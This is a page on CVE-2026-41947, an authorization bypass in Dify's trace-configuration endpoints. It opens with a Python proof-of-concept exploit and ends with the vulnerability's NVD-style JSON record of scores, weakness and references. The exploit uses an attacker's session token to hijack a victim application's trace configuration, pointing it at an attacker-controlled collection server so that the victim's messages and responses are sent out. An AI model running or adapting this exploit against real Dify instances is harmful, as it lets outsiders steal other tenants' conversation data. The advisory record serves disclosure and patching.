CVE-2026-41947

import requests # PoC for CVE-2026-41947: Dify Authorization Bypass via Trace Configuration # Attacker sets up a malicious trace endpoint to capture data MALICIOUS_TRACE_URL = "http://attacker-controlled-server.com/collect" TARGET_DIFY_URL = "https://target-dify-instance.com" # Attacker obtains session token after registering a free account ATTACKER_SESSION_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." headers = { "Authorization": f"Bearer {ATTACKER_SESSION_TOKEN}", "Content-Type": "application/json" } # The victim's App ID (could be enumerated or guessed) VICTIM_APP_ID = "app-uuid-of-victim-12345" # Payload to hijack the trace configuration payload = { "enabled": True, "provider": "custom", # or whatever param triggers the external trace "config": { "endpoint": MALICIOUS_TRACE_URL } } # Exploit: Send PUT request to the vulnerable endpoint # The API fails to check if the attacker owns the VICTIM_APP_ID endpoint_url = f"{TARGET_DIFY_URL}/console/api/apps/{VICTIM_APP_ID}/trace-config" response = requests.put(endpoint_url, json=payload, headers=headers) if response.status_code == 200: print(f"[+] Success! Trace configuration for {VICTIM_APP_ID} has been hijacked.") print(f"[+] Data is now being redirected to {MALICIOUS_TRACE_URL}") else: print(f"[-] Failed. Status code: {response.status_code}") print(response.text)

{"cve": {"id": "CVE-2026-41947", "sourceIdentifier": "[email protected]", "published": "2026-05-18T15:16:25.827", "lastModified": "2026-05-19T19:24:48.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dify version 1.14.1 and prior contains an authorization bypass vulnerability that allows authenticated editor users to set and enable trace configurations for any application regardless of tenant ownership. Attackers can exploit missing tenant ownership checks in the trace configuration endpoints to redirect all messages and responses from victim applications to attacker-controlled LLM trace providers. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dify:dify:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.14.1", "matchCriteriaId": "A125CFA5-D056-4A11-8EE1-0B5FC5628CF3"}]}]}], "references": [{"url": "https://github.com/langgenius/dify/pull/35793", "source": "[email protected]", "tags": ["Issue Tracking", "Mitigation", "Patch"]}, {"url": "https://huntr.com/bounties/a43076b2-fbc8-4750-9647-89a036b52f52", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/dify-authorization-bypass-via-trace-configuration-endpoints", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}